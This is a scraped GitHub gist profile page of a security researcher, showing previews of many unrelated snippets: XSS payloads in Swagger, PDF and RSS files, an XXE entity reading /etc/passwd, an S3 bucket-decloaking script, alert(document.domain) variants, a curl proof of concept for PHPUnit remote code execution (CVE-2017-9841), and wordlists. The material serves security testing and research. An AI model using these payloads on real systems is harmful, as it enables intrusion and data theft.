Skip to content

Instantly share code, notes, and snippets.

View yassineaboukir's full-sized avatar
🐐
I've goat this!

Yassine ABOUKIR yassineaboukir

🐐
I've goat this!
View GitHub Profile
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=console.log('XSS-PoC-by-@yassineaboukir') src=1>"></form>
version: production
basePath: /JSSResource/
produces:
- application/xml
@yassineaboukir
yassineaboukir / poc.js
Created May 7, 2022 22:42 — forked from andripwn/poc.js
PDF Bypass - Cross-site Scripting (XSS)
app.alert("XSS")
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<channel>
<atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/>
<title>Data <![CDATA[<]]>script<![CDATA[>]]>alert(0)<![CDATA[<]]>/script<![CDATA[>]]></title>
<pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate>
<lastBuildDate>Fri, 15 Jan 2016 15:08:58 +0000</lastBuildDate>
<generator>Libsyn <![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]> 2.0</generator>
<link>http://dataskeptic.com</link>
<language>en</language>
@yassineaboukir
yassineaboukir / rss.xml
Last active March 17, 2022 15:45
Malicious RSS for security testing purposes
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY xxe SYSTEM
"file:///etc/passwd" >
]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<channel>
<atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/>
<title>&xxe</title>
<pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate>
@yassineaboukir
yassineaboukir / bucket-disclose.sh
Created October 5, 2021 16:55 — forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
<?
//
// AUTO KEYWORD-BASED FOLLOWER CURATION BOT (by @levelsio)
//
// File: twitterFollowerCuratorBot.php
//
// Created: May 2021
// License: MIT
//
@yassineaboukir
yassineaboukir / alert.js
Created March 24, 2021 14:08 — forked from tomnomnom/alert.js
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@yassineaboukir
yassineaboukir / gist:1501de6f60dce148824d3001e83fb263
Created September 10, 2020 11:17
PHPunit RCE PoC (CVE-2017-9841)
$ curl --data "<?php echo(pi());" http://localhost:8888/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Source: http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/
@yassineaboukir
yassineaboukir / all.txt
Created February 15, 2020 09:04 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@yassineaboukir
yassineaboukir / gist:726992bd1f0a4eb637d150b7b5c66079
Last active December 7, 2022 16:09
List of reserved names to blacklist from registration/username claim for security reasons and RFC compliance
abuse
admin
administrator
ftp
hostmaster
info
is
it
list
list-request